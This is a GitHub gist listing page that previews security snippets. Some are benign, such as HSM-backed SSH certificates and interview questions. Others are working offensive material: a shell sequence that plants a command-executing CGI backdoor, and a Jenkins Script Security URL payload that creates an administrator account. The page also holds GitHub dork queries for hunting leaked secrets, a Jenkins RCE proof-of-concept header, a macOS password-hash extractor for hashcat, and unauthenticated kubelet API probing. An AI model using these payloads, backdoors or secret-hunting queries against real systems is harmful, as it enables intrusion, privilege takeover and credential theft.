Chris Gates carnal0wnage
View gist:38dcff6a0975f148aa858e924d64c492
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| cd /tmp | |
| mkdir cgi-bin | |
| echo '#!/bin/bash' > ./cgi-bin/backdoor.cgi | |
| echo 'echo -e "Content-Type: text/plain\n\n"' >> ./cgi-bin/backdoor.cgi | |
| echo 'echo -e $($1)' >> ./cgi-bin/backdoor.cgi | |
| chmod +x ./cgi-bin/backdoor.cgi | |
| python -m http.server --cgi | |
cmc
/ YubiHSM2 Backed SSH Certificates
Last active Oct 8, 2021
View YubiHSM2 Backed SSH Certificates
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ### I use HSM backed SSH certs and so can you. [why?: keys can be stolen, certs expire!] | |
| 1. Get a YubiHSM2 @ https://www.yubico.com/products/hardware-security-module/ | |
| 2. Follow this: https://github.com/YubicoLabs/yubihsm-ssh-tool [ Yes, you're going to have to install all the other yubico stuff too, yubico-connector, etc, ..] on your issuing machine, or airgapped machine. | |
| 3. Be content that you can now sign certificates with the HSM on the issuer/airgapped machine. | |
| 3. Update /etc/ssh/sshd_config on remote server to add: | |
| TrustedUserCAKeys /etc/ssh/ca.pub | |
| AuthorizedPrincipalsFile /etc/ssh/auth_principals/%u | |
| 4. Add principals here: | |
| ex: |
jhaddix
/ Github bash generated search links (from hunter.sh)
Created Jan 12, 2020
Github bash generated search links (from hunter.sh)
View Github bash generated search links (from hunter.sh)
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "" | |
| echo "************ Github Dork Links (must be logged in) *******************" | |
| echo "" | |
| echo " password" | |
| echo "https://github.com/search?q=%22$1%22+password&type=Code" | |
| echo "https://github.com/search?q=%22$without_suffix%22+password&type=Code" | |
| echo "" | |
| echo " npmrc _auth" |
kmcquade
/ AWS API calls that return credentials.md
Last active Jul 22, 2022
AWS API calls that return credentials
teddziuba
/ osx_extract_hash.py
Last active Jul 28, 2022
Extract a Mac OSX Catalina user's password hash as a hashcat-compatible string
View osx_extract_hash.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python3 | |
| """ | |
| Mac OSX Catalina User Password Hash Extractor | |
| Extracts a user's password hash as a hashcat-compatible string. | |
| Mac OSX Catalina (10.15) uses a salted SHA-512 PBKDF2 for storing user passwords | |
| (hashcat type 7100), and it's saved in an annoying binary-plist-nested-inside-xml-plist | |
| format, so previously reported methods for extracting the hash don't work. |
nullenc0de
/ auto_git_query
Last active Jul 8, 2022
Automated Github Queries (Can open 29 tabs at a time)
View auto_git_query
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| https://github.com/search?q=BROWSER_STACK_ACCESS_KEY= OR BROWSER_STACK_USERNAME= OR browserConnectionEnabled= OR BROWSERSTACK_ACCESS_KEY=&s=indexed&type=Code | |
| https://github.com/search?q=CHROME_CLIENT_SECRET= OR CHROME_EXTENSION_ID= OR CHROME_REFRESH_TOKEN= OR CI_DEPLOY_PASSWORD= OR CI_DEPLOY_USER=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDAMQP_URL= OR CLOUDANT_APPLIANCE_DATABASE= OR CLOUDANT_ARCHIVED_DATABASE= OR CLOUDANT_AUDITED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CLOUDANT_ORDER_DATABASE= OR CLOUDANT_PARSED_DATABASE= OR CLOUDANT_PASSWORD= OR CLOUDANT_PROCESSED_DATABASE=&s=indexed&type=Code | |
| https://github.com/search?q=CONTENTFUL_PHP_MANAGEMENT_TEST_TOKEN= OR CONTENTFUL_TEST_ORG_CMA_TOKEN= OR CONTENTFUL_V2_ACCESS_TOKEN=&s=indexed&type=Code | |
| https://github.com/search?q=-DSELION_BROWSER_RUN_HEADLESS= OR -DSELION_DOWNLOAD_DEPENDENCIES= OR -DSELION_SELENIUM_RUN_LOCALLY=&s=indexed&type=Code | |
| https://github.com/search?q=ELASTICSEARCH_PASSWORD= OR ELASTICSEARCH_USERNAME= OR EMAIL_NOTIFI |
View payload
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| http://localhost:8080/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript/?sandbox=True&value=import+jenkins.model.*%0aimport+hudson.security.*%0aclass+nice{nice(){def+instance=Jenkins.getInstance();def+hudsonRealm=new+HudsonPrivateSecurityRealm(false);hudsonRealm.createAccount("game","game");instance.setSecurityRealm(hudsonRealm);instance.save();def+strategy=new+GlobalMatrixAuthorizationStrategy();%0astrategy.add(Jenkins.ADMINISTER,'game');instance.setAuthorizationStrategy(strategy)}} |
adamyordan
/ CVE-2019-1003000-Jenkins-RCE-POC.py
Last active Jul 29, 2019
CVE-2019-1003000-Jenkins-RCE-POC
View CVE-2019-1003000-Jenkins-RCE-POC.py
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # Author: Adam Jordan | |
| # Date: 2019-02-15 | |
| # Repository: https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc | |
| # PoC for: SECURITY-1266 / CVE-2019-1003000 (Script Security), CVE-2019-1003001 (Pipeline: Groovy), CVE-2019-1003002 (Pipeline: Declarative) | |
| import argparse | |
| import jenkins |
namishelex01
/ Security Engineer - Interview Questions.md
Last active Jul 24, 2022
Cyber security engineer, Security Engineer, Security Analyst, Information Security Analyst and many more names
View Security Engineer - Interview Questions.md
Core Information Security
-
What is information security and how is it achieved?
-
What are the core principles of information security?
-
What is the CIA triangle?
-
What is non-repudiation (as it applies to IT security)?
View kubelet-api.md
Accessing Kubelet API
curl -sk https://localhost:10250/pods/- If
--anonymous-authis turned off, you will see a401 Unauthorizedresponse. - If
--anonymous-authistrueand--authorization-modeisWebhookyou'll see403 Forbiddenresponse with messageForbidden (user=system:anonymous, verb=get, resource=nodes, subresource=proxy) - If
--anonymous-authistrueand--authorization-modeisAlwaysAllowyou'll see a list of pods.
NewerOlder